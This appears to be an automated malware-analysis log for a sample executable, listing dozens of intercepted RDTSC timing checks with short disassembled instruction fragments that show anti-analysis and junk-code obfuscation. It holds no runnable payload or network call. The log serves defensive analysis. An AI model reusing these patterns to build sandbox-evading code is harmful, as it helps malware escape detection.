Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FE20 second address: C3FE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C400C8 second address: C400CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C400CE second address: C400D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C400D4 second address: C40101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC064DD4F76h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FC064DD4F76h 0x00000015 jmp 00007FC064DD4F88h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C40101 second address: C40105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C40105 second address: C40148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jg 00007FC064DD4F76h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC064DD4F80h 0x0000001e jg 00007FC064DD4F76h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4CEDC second address: C4CEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D360 second address: C4D37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC064DD4F76h 0x0000000a jmp 00007FC064DD4F81h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D37F second address: C4D392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BEh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D392 second address: C4D3AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC064DD4F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FC064DD4F76h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D3AA second address: C4D3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D4F0 second address: C4D4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4D7DD second address: C4D7E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4DA57 second address: C4DA7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F83h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FC064DD4F7Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C4C99B second address: C4C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C546DE second address: C546E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C546E3 second address: C546F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C546F5 second address: C546FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C5427D second address: C54282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C664B2 second address: C664B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C664B6 second address: C664BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C664BA second address: C664DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FC064DD4F82h 0x00000011 jns 00007FC064DD4F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C666B3 second address: C666BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C666BB second address: C666BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C68247 second address: C6826E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BFh 0x00000007 jng 00007FC064DA37B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC064DA37BCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C6826E second address: C68272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C68272 second address: C68283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C6CE91 second address: C6CE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C6CE97 second address: C6CE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8795C second address: B87990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC064DD4F76h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FC064DD4F80h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 je 00007FC064DD4F7Eh 0x0000001a jno 00007FC064DD4F76h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B87990 second address: B87994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B87994 second address: B879AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC064DD4F7Eh 0x0000000e jo 00007FC064DD4F76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B879AA second address: B879B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C7605C second address: C76075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F82h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C7BB2E second address: C7BB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C7D11D second address: C7D121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C7D121 second address: C7D127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C828FF second address: C82903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C82903 second address: C82907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C82907 second address: C8290D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C8290D second address: C82916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C82D02 second address: C82D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FC064DD4F81h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C82D24 second address: C82D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C82D29 second address: C82D33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC064DD4F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C86953 second address: C86971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37C3h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C86971 second address: C86987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C89E56 second address: C89E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C972D1 second address: C972D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C972D5 second address: C972EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC064DA37B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FC064DA37BEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C942EC second address: C942F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CA6CD5 second address: CA6CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CA6CF5 second address: CA6CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CA6CFB second address: CA6D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jc 00007FC064DA37E7h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC064DA37C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CA6D21 second address: CA6D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBBB7C second address: CBBB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBBB81 second address: CBBB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC064DD4F76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBBB8B second address: CBBB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBA9DA second address: CBA9DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB5C3 second address: CBB5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB5C9 second address: CBB5CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB5CD second address: CBB5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jg 00007FC064DA37B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB5DD second address: CBB5ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB5ED second address: CBB60D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC064DA37C8h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB7E4 second address: CBB7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB7E8 second address: CBB7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBB7EE second address: CBB7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FC064DD4FC1h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBE799 second address: CBE7BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC064DA37B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FC064DA37DFh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC064DA37BDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBFD0F second address: CBFD19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBFD19 second address: CBFD29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CBFD29 second address: CBFD6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F80h 0x00000010 pushad 0x00000011 jns 00007FC064DD4F76h 0x00000017 jmp 00007FC064DD4F7Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CC17AE second address: CC17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CC17BA second address: CC17C6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DD4F76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CC37B3 second address: CC37E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC064DA37B6h 0x0000000a jmp 00007FC064DA37C8h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FC064DA37B6h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CC37E0 second address: CC37EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC064DD4F76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: CC37EA second address: CC37F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD0F9A second address: BD0F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD0F9E second address: BD0FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0863 second address: 4DD0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0869 second address: 4DD08CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC064DA37C6h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FC064DA37C0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FC064DA37C0h 0x0000001b xchg eax, ecx 0x0000001c jmp 00007FC064DA37C0h 0x00000021 push eax 0x00000022 jmp 00007FC064DA37BBh 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD08CF second address: 4DD08D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD08D3 second address: 4DD08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD08D9 second address: 4DD0913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC064DD4F88h 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC064DD4F7Fh 0x00000018 mov cx, 32DFh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0913 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD091D second address: 4DD0955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FC064DA37C3h 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC064DA37C5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0955 second address: 4DD097A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC064DD4F7Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD097A second address: 4DD0980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DD0A9A second address: 4DC01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov ax, 6423h 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 leave 0x00000014 jmp 00007FC064DD4F7Bh 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne al 0x00000023 xor ebx, ebx 0x00000025 test al, 01h 0x00000027 jne 00007FC064DD4F77h 0x00000029 sub esp, 04h 0x0000002c mov dword ptr [esp], 0000000Dh 0x00000033 call 00007FC0691945E8h 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC064DD4F7Bh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: 4DC01C0 second address: 4DC02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC064DA37BFh 0x00000009 or si, 598Eh 0x0000000e jmp 00007FC064DA37C9h 0x00000013 popfd 0x00000014 mov bh, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ebx 0x0000001a jmp 00007FC064DA37C8h 0x0000001f mov dword ptr [esp], ebp 0x00000022 pushad 0x00000023 mov esi, 3D42EF4Dh 0x00000028 movzx esi, dx 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FC064DA37BBh 0x00000035 sbb cx, 5CFEh 0x0000003a jmp 00007FC064DA37C9h 0x0000003f popfd 0x00000040 mov bx, si 0x00000043 popad 0x00000044 sub esp, 2Ch 0x00000047 pushad 0x00000048 mov eax, 2270463Fh 0x0000004d jmp 00007FC064DA37C4h 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 jmp 00007FC064DA37C0h 0x00000059 push eax 0x0000005a jmp 00007FC064DA37BBh 0x0000005f xchg eax, ebx 0x00000060 pushad 0x00000061 mov esi, 62287D2Bh 0x00000066 pushfd 0x00000067 jmp 00007FC064DA37C0h 0x0000006c add esi, 72EA70B8h 0x00000072 jmp 00007FC064DA37BBh 0x00000077 popfd 0x00000078 popad 0x00000079 xchg eax, edi 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FC064DA37C5h 0x00000081 rdtsc
